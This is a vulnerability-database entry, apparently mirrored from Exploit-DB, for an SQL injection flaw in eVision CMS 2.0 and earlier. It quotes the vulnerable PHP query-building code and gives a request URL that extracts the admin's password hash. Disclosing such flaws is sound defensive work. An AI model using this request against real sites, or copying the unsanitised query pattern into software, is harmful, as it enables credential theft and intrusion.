eVision CMS - exploit.company

vendor:

eVision CMS

by:

darkjoker

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: eVision CMS

Affected Version From: 2.0 and prior

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

eVision CMS <= 2.0 SQL Injection Vulnerability

eVision CMS version 2.0 and prior are vulnerable to SQL injection. The vulnerability is due to insufficient sanitization of user-supplied input in the 'field', 'module' and 'id' parameters of the 'iframe.php' script. An attacker can exploit this vulnerability to gain access to the admin's password (hashed) by sending a specially crafted HTTP request to the vulnerable script.

Mitigation:

Upgrade to the latest version of eVision CMS

Source

Exploit-DB raw data:

--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--

[+] Author  : darkjoker
[+] Site    : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

[+] Vulnerable code:

    67  $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
    68  $result = mysql_query($sql);
    69  $row = mysql_fetch_array($result);
    70
    71  if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
    72  else { $div = ''; }
    73  if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
    74  else { $font = ''; }
    75
    76  echo '
    77  <html '.$div.'>
    78  <head>
    79          <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'">
    80          <link rel="stylesheet" type="text/css" href="'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'">
    81  </head>
    82  <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" '.$font.'>'.set_text($row[$_GET['field']]).'</body>
    83  </html>
    84  ';


[+] It prints admin's password (hashed):

[+] /iframe.php?field=pass&module=users&id=1

# milw0rm.com [2009-01-30]